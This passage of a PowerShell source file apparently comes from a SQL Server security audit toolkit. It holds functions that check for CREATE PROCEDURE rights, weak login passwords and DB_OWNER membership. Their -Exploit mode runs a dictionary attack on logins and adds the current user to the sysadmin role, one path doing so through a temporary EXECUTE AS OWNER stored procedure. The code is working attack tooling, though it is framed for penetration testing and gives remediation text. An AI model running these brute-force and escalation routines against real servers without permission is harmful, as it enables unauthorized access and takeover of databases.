HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED" Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS" } # Grab server, login, and role information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ComputerName = $ServerInfo.ComputerName $CurrentLogin = $ServerInfo.CurrentLogin $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose $CurrentPrincpalList = @() $CurrentPrincpalList += $CurrentLogin $CurrentPrincpalList += 'Public' $CurrentLoginRoles | ForEach-Object -Process { $CurrentPrincpalList += $_.RolePrincipalName } # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'PERMISSION - CREATE PROCEDURE' $Description = 'The login has privileges to create stored procedures in one or more databases. This may allow the login to escalate privileges within the database.' $Remediation = 'If the permission is not required remove it. Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a command like: REVOKE CREATE PROCEDURE TO user' $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = "No exploit is currently available that will allow $CurrentLogin to become a sysadmin." $Details = '' $Dependancies = '' $Reference = 'https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Get all CREATE PROCEDURE grant permissions for all accessible databases $Permissions = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -SuppressVerbose | Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PermissionName 'CREATE PROCEDURE' if($Permissions) { # Iterate through each current login and their associated roles $CurrentPrincpalList| ForEach-Object -Process { # Check if they have the CREATE PROCEDURE grant $CurrentPrincipal = $_ $Permissions | ForEach-Object -Process { $AffectedPrincipal = $_.PrincipalName $AffectedDatabase = $_.DatabaseName if($AffectedPrincipal -eq $CurrentPrincipal) { # Set flag to vulnerable $IsVulnerable = 'Yes' Write-Verbose -Message "$Instance : - The $AffectedPrincipal principal has the CREATE PROCEDURE permission in the $AffectedDatabase database." $Details = "The $AffectedPrincipal principal has the CREATE PROCEDURE permission in the $AffectedDatabase database." # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- $HasAlterSchema = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PermissionName 'ALTER' -PermissionType 'SCHEMA' -PrincipalName $CurrentPrincipal -DatabaseName $AffectedDatabase -SuppressVerbose if($HasAlterSchema) { $IsExploitable = 'Yes' $Dependancies = " $CurrentPrincipal also has ALTER SCHEMA permissions so procedures can be created." Write-Verbose -Message "$Instance : - Dependancies were met: $CurrentPrincipal has ALTER SCHEMA permissions." # Add to report example $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, "$Details$Dependancies", $Reference, $Author) } else { $IsExploitable = 'No' # Add to report example $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- if($Exploit -and $IsExploitable -eq 'Yes') { Write-Verbose -Message "$Instance : - No server escalation method is available at this time." } } } } } else { # Status user Write-Verbose -Message "$Instance : - The current login doesn't have the CREATE PROCEDURE permission in any databases." } # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditWeakLoginPw # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditWeakLoginPw { <# .SYNOPSIS Perform dictionary attack for common passwords. By default, it will enumerate SQL Server logins and the current login and test for "username" as password for each enumerated login. .PARAMETER Username Known SQL Server login to obtain a list of logins with for testing. .PARAMETER TestUsername SQL Server or domain account to authenticate with. .PARAMETER UserFile Path to list of users to use. One per line. .PARAMETER Password Known SQL Server login password to obtain a list of logins with for testing. .PARAMETER TestPassword Password to test provided or discovered logins with. .PARAMETER PassFile Path to list of password to use. One per line. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER NoUserAsPass Don't try to login using the login name as the password. .PARAMETER NoUserEnum Don't try to enumerate logins to test. .PARAMETER FuzzNum The number of Principal IDs to fuzz during blind SQL login enumeration as a least privilege login. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Get-SQLInstanceLocal | Invoke-SQLAuditWeakLoginPw -Username myuser -Password mypassword ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : Weak Login Password Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. Details : The testuser (Not Sysadmin) is configured with the password testuser. Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 ComputerName : SQLServer1 Instance : SQLServer1\Express Vulnerability : Weak Login Password Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. Details : The testadmin (Sysadmin) is configured with the password testadmin. Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Invoke-SQLAuditWeakLoginPw -Verbose -Instance SQLServer1\STANDARDDEV2014 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Known SQL Server login to fuzz logins with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Username to test.')] [string]$TestUsername = 'sa', [Parameter(Mandatory = $false, HelpMessage = 'Path to list of users to use. One per line.')] [string]$UserFile, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Known SQL Server password to fuzz logins with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server password to attempt to login with.')] [string]$TestPassword, [Parameter(Mandatory = $false, HelpMessage = 'Path to list of passwords to use. One per line.')] [string]$PassFile, [Parameter(Mandatory = $false, HelpMessage = 'User is tested as pass by default. This setting disables it.')] [switch]$NoUserAsPass, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't attempt to enumerate logins from the server.")] [switch]$NoUserEnum, [Parameter(Mandatory = $false, HelpMessage = 'Number of Principal IDs to fuzz.')] [string]$FuzzNum = 10000, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [switch]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Weak Login Password" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Weak Login Password." Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName $CurrentUSerSysadmin = $ServerInfo.IsSysadmin # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Weak Login Password' $Description = 'One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to.' $Remediation = 'Ensure all SQL Server logins are required to use a strong password. Consider inheriting the OS password policy.' $Severity = 'High' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.' $Details = '' $Reference = 'https://msdn.microsoft.com/en-us/library/ms161959.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Create empty user / password lists $LoginList = @() $PasswordList = @() # Get logins for testing - file if($UserFile) { Write-Verbose -Message "$Instance - Getting logins from file..." Get-Content -Path $UserFile | ForEach-Object -Process { $LoginList += $_ } } # Get logins for testing - variable if($TestUsername) { Write-Verbose -Message "$Instance - Getting supplied login..." $LoginList += $TestUsername } # Get logins for testing - fuzzed if(-not $NoUserEnum) { # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { # Check if sysadmin $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin -eq 'Yes') { # Query for logins Write-Verbose -Message "$Instance - Getting list of logins..." Get-SQLServerLogin -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.PrincipalType -eq 'SQL_LOGIN' } | Select-Object -Property PrincipalName -ExpandProperty PrincipalName | ForEach-Object -Process { $LoginList += $_ } } else { # Fuzz logins Write-Verbose -Message "$Instance : Enumerating principal names from $FuzzNum principal IDs.." Get-SQLFuzzServerLogin -Instance $Instance -GetPrincipalType -Username $Username -Password $Password -Credential $Credential -FuzzNum $FuzzNum -SuppressVerbose | Where-Object -FilterScript { $_.PrincipleType -eq 'SQL Login' } | Select-Object -Property PrincipleName -ExpandProperty PrincipleName | ForEach-Object -Process { $LoginList += $_ } } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance - Connection Failed - Could not authenticate with provided credentials." } return } } # Check for users or return - count array if($LoginList.count -eq 0 -and (-not $FuzzLogins)) { Write-Verbose -Message "$Instance - No logins have been provided." return } # Get passwords for testing - file if($PassFile) { Write-Verbose -Message "$Instance - Getting password from file..." Get-Content -Path $PassFile | ForEach-Object -Process { $PasswordList += $_ } } # Get passwords for testing - variable if($TestPassword) { Write-Verbose -Message "$Instance - Getting supplied password..." $PasswordList += $TestPassword } # Check for provided passwords if($PasswordList.count -eq 0 -and ($NoUserAsPass)) { Write-Verbose -Message "$Instance - No passwords have been provided." return } # Iternate through logins and perform dictionary attack Write-Verbose -Message "$Instance - Performing dictionary attack..." $LoginList | Select-Object -Unique | ForEach-Object -Process { $TargetLogin = $_ $PasswordList | Select-Object -Unique | ForEach-Object -Process { $TargetPassword = $_ $TestPass = Get-SQLConnectionTest -Instance $Instance -Username $TargetLogin -Password $TargetPassword -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestPass) { # Check if guess credential is a sysadmin $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $TargetLogin -Password $TargetPassword -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin -eq 'Yes') { $SysadminStatus = 'Sysadmin' } else { $SysadminStatus = 'Not Sysadmin' } Write-Verbose -Message "$Instance - Successful Login: User = $TargetLogin ($SysadminStatus) Password = $TargetPassword" if($Exploit) { Write-Verbose -Message "$Instance - Trying to make you a sysadmin..." # Check if the current login is a sysadmin $IsSysadmin1 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin1 -eq 'Yes') { Write-Verbose -Message "$Instance - You're already a sysadmin. Nothing to do." } else { Write-Verbose -Message "$Instance - You're not currently a sysadmin. Let's change that..." # Add current user as sysadmin if login was successful Get-SQLQuery -Instance $Instance -Username $TargetLogin -Password $TargetPassword -Credential $Credential -Query "EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'" -SuppressVerbose # Check if the current login is a sysadmin again $IsSysadmin2 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin2 -eq 'Yes') { $Exploited = 'Yes' Write-Verbose -Message "$Instance - SUCCESS! You're a sysadmin now." } else { $Exploited = 'No' Write-Verbose -Message "$Instance - Fail. We coudn't add you as a sysadmin." } } } # Add record $Details = "The $TargetLogin ($SysadminStatus) is configured with the password $TargetPassword." $IsVulnerable = 'Yes' $IsExploitable = 'Yes' $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } else { Write-Verbose -Message "$Instance - Failed Login: User = $TargetLogin Password = $TargetPassword" } } } # Test user as pass if(-not $NoUserAsPass) { $LoginList | Select-Object -Unique | ForEach-Object -Process { $TargetLogin = $_ $TestPass = Get-SQLConnectionTest -Instance $Instance -Username $TargetLogin -Password $TargetLogin -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestPass) { # Check if user/name combo has sysadmin $IsSysadmin3 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $TargetLogin -Password $TargetLogin -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin3 -eq 'Yes') { $SysadminStatus = 'Sysadmin' } else { $SysadminStatus = 'Not Sysadmin' } Write-Verbose -Message "$Instance - Successful Login: User = $TargetLogin ($SysadminStatus) Password = $TargetLogin" if(($Exploit) -and $IsSysadmin3 -eq 'Yes') { # Check if the current login is a sysadmin $IsSysadmin4 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin4 -eq 'Yes') { Write-Verbose -Message "$Instance - You're already a sysadmin. Nothing to do." } else { Write-Verbose -Message "$Instance - You're not currently a sysadmin. Let's change that..." # Add current user as sysadmin if login was successful Get-SQLQuery -Instance $Instance -Username $TargetLogin -Password $TargetLogin -Credential $Credential -Query "EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'" -SuppressVerbose # Check if the current login is a sysadmin again $IsSysadmin5 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin5 -eq 'Yes') { $Exploited = 'Yes' Write-Verbose -Message "$Instance - SUCCESS! You're a sysadmin now." } else { $Exploited = 'No' Write-Verbose -Message "$Instance - Fail. We coudn't add you as a sysadmin." } } } # Add record $Details = "The $TargetLogin ($SysadminStatus) principal is configured with the password $TargetLogin." $IsVulnerable = 'Yes' $IsExploitable = 'Yes' $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } else { Write-Verbose -Message "$Instance - Failed Login: User = $TargetLogin Password = $TargetLogin" } } } # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # $IsExploitable = "No" or $IsExploitable = "Yes" # Check if the link is alive and verify connection + check if sysadmin # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- # $Exploited = "No" or $Exploited = "Yes" - check if login is a sysadmin # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Weak Login Password" } End { # Return data if ( -not $NoOutput) { Return $TblData | Sort-Object -Property computername, instance, details } } } # --------------------------------------- # Invoke-SQLAuditRoleDbOwner # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditRoleDbOwner { <# .SYNOPSIS Check if the current login has the db_owner role in any databases. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditRoleDbOwner -Instance SQLServer1\STANDARDDEV2014 -Username myuser -Password mypassword ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : DATABASE ROLE - DB_OWNER Description : The login has the DB_OWER role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin. Remediation : If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_OWNER', 'MyDbUser', and can be removed with a command like: EXEC sp_droprolemember 'DB_OWNER', 'MyDbUser' Severity : Medium IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Invoke-SQLAuditRoleDbOwner -Instance SQLServer1\STANDARDDEV2014 -Username myuser -Password mypassword -Exploit Details : myuser has the DB_OWNER role in the testdb database. Reference : https://msdn.microsoft.com/en-us/library/ms189121.aspx,https://msdn.microsoft.com/en-us/library/ms187861.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditRoleDbOwner -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED" Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS" } # Grab server, login, and role information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ComputerName = $ServerInfo.ComputerName $CurrentLogin = $ServerInfo.CurrentLogin $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose $CurrentPrincpalList = @() $CurrentPrincpalList += $CurrentLogin $CurrentPrincpalList += 'Public' $CurrentLoginRoles | ForEach-Object -Process { $CurrentPrincpalList += $_.RolePrincipalName } # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'DATABASE ROLE - DB_OWNER' $Description = 'The login has the DB_OWER role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin.' $Remediation = "If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_OWNER', 'MyDbUser', and can be removed with a command like: EXEC sp_droprolemember 'DB_OWNER', 'MyDbUser'" $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' if($Username) { $ExploitCmd = "Invoke-SQLAuditRoleDbOwner -Instance $Instance -Username $Username -Password $Password -Exploit" } else { $ExploitCmd = "Invoke-SQLAuditRoleDbOwner -Instance $Instance -Exploit" } $Details = '' $Dependancies = 'Affected databases must be owned by a sysadmin and be trusted.' $Reference = 'https://msdn.microsoft.com/en-us/library/ms189121.aspx,https://msdn.microsoft.com/en-us/library/ms187861.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Iterate through each current login and their associated roles $CurrentPrincpalList| ForEach-Object -Process { # Check if login or role has the DB_OWNER roles in any databases $DBOWNER = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -RolePrincipalName DB_OWNER -PrincipalName $_ -SuppressVerbose # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # Check for db ownerships if($DBOWNER) { # Add an entry for each database where the user has the db_owner role $DBOWNER| ForEach-Object -Process { $DatabaseTarget = $_.DatabaseName $PrincipalTarget = $_.PrincipalName Write-Verbose -Message "$Instance : - $PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." $IsVulnerable = 'Yes' # Check if associated database is trusted and the owner is a sysadmin $Depends = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseTarget -SuppressVerbose | Where-Object -FilterScript { $_.is_trustworthy_on -eq 1 -and $_.OwnerIsSysadmin -eq 1 } if($Depends) { $IsExploitable = 'Yes' Write-Verbose -Message "$Instance : - The $DatabaseTarget database is set as trustworthy and is owned by a sysadmin. This is exploitable." # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- if($Exploit) { # Check if user is already a sysadmin $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status if($SysadminPreCheck -eq 0) { # Status user Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by using DB_OWNER permissions..." $SpQuery = "CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS begin EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin' end;" # Add sp_elevate_me stored procedure $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "$SpQuery" -SuppressVerbose -Database $DatabaseTarget # Run sp_elevate_me stored procedure $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query 'sp_elevate_me' -SuppressVerbose -Database $DatabaseTarget # Remove sp_elevate_me stored procedure $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query 'DROP PROC sp_elevate_me' -SuppressVerbose -Database $DatabaseTarget # Verify the login was added successfully $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status if($SysadminPostCheck -eq 1) { Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" $Exploited = 'Yes' } else { } } else { Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." } #Add record $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } else { #Add record $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } else { #Add record Write-Verbose -Message "$Instance : - The $DatabaseTarget is not exploitable." $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database, but this was not exploitable." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } } } # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditRoleDbDdlAdmin # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditRoleDbDdlAdmin { <# .SYNOPSIS Check if the current user has the db_ddladmin role in any databases. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditRoleDbDdlAdmin -Instance SQLServer1\STANDARDDEV2014 -username myuser -password mypassword ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : DATABASE ROLE - DB_DDLADMIN Description : The login has the DB_DDLADMIN role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin, or if a custom assembly can be loaded. Remediation : If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_DDLADMIN', 'MyDbUser', and can be removed with a command like: EXEC sp_droprolemember 'DB_DDLADMIN', 'MyDbUser' Severity : Medium IsVulnerable : Yes IsExploitable : No Exploited : No ExploitCmd : No exploit command is available at this time, but a custom assesmbly could be used. Details : myuser has the DB_DDLADMIN role in the testdb database. Reference : https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditRoleDbDdlAdmin -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, 